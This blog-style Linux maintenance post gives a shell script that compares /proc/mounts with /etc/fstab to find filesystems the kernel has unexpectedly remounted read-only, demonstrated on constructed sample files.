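An added shell example (not from the original post) that replaces the touch-in-every-directory test of step 2: it reads the mount options from /proc/mounts, which is where the kernel records a filesystem it has switched to read-only, and compares them with /etc/fstab so that mounts that are read-only on purpose are not reported. The /proc/mounts and fstab contents below are constructed; the paths follow the post.

```shell
#!/bin/sh
# Added example, not code from the original post: list filesystems that are
# mounted read-only although fstab says they should be read-write.

# ro_mounts [MOUNTS_FILE] -> "device mountpoint fstype" for every read-only
# mount, skipping pseudo filesystems and media that are always read-only
ro_mounts() {
    awk '
    $3 ~ /^(rootfs|proc|sysfs|devpts|tmpfs|devtmpfs|cgroup|cgroup2|debugfs|securityfs|selinuxfs|binfmt_misc|rpc_pipefs|nfsd|autofs|mqueue|hugetlbfs|pstore|configfs|fusectl|tracefs|bpf|squashfs|iso9660)$/ { next }
    {
        n = split($4, opt, ",")
        for (i = 1; i <= n; i++) if (opt[i] == "ro") { print $1, $2, $3; break }
    }' "${1:-/proc/mounts}"
}

# unexpected_ro MOUNTS_FILE FSTAB_FILE -> mount points that are read-only now
# but not declared ro in fstab. Matched by mount point, because fstab may say
# /dev/VolGroup00/LogVol03 while /proc/mounts shows /dev/mapper/VolGroup00-LogVol03.
unexpected_ro() {
    ro_mounts "$1" | while read -r dev mnt fstype; do
        declared=$(awk -v m="$mnt" '$1 !~ /^#/ && $2 == m { print $4; exit }' "$2")
        case ",$declared," in
            *,ro,*) ;;                       # read-only by design
            *) printf '%s\n' "$mnt" ;;
        esac
    done
}

# make_samples -> directory with constructed "mounts" and "fstab" files:
# /opt has been flipped to ro by the kernel, /archive is ro on purpose
make_samples() {
    d=$(mktemp -d)
    cat > "$d/mounts" <<'EOF'
rootfs / rootfs rw 0 0
proc /proc proc rw,relatime 0 0
/dev/mapper/VolGroup00-LogVol01 / ext3 rw,relatime,errors=remount-ro,data=ordered 0 0
/dev/mapper/VolGroup00-LogVol03 /opt ext3 ro,relatime,errors=remount-ro,data=ordered 0 0
/dev/sda1 /boot ext3 rw,relatime 0 0
/dev/sdb1 /archive ext3 ro,noatime 0 0
/dev/sr0 /media/cdrom iso9660 ro,relatime 0 0
tmpfs /dev/shm tmpfs rw,relatime 0 0
EOF
    cat > "$d/fstab" <<'EOF'
/dev/VolGroup00/LogVol01 /        ext3 defaults   1 1
/dev/VolGroup00/LogVol03 /opt     ext3 defaults   1 2
/dev/sda1                /boot    ext3 defaults   1 2
/dev/sdb1                /archive ext3 ro,noatime 1 2
EOF
    printf '%s\n' "$d"
}

# Demo: prints /opt. On a real box: unexpected_ro /proc/mounts /etc/fstab
# Repair as in the post: umount /opt (fuser -mk /opt if busy), fsck -t ext3 /opt, mount /opt.
S=$(make_samples)
unexpected_ro "$S/mounts" "$S/fstab"
rm -rf "$S"
```

Because it only reads /proc/mounts and /etc/fstab, the check is safe to run from cron or from a Nagios plugin; a non-empty result is the signal to schedule the unmount and fsck.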

Posted in Linux maintenance and tuning.
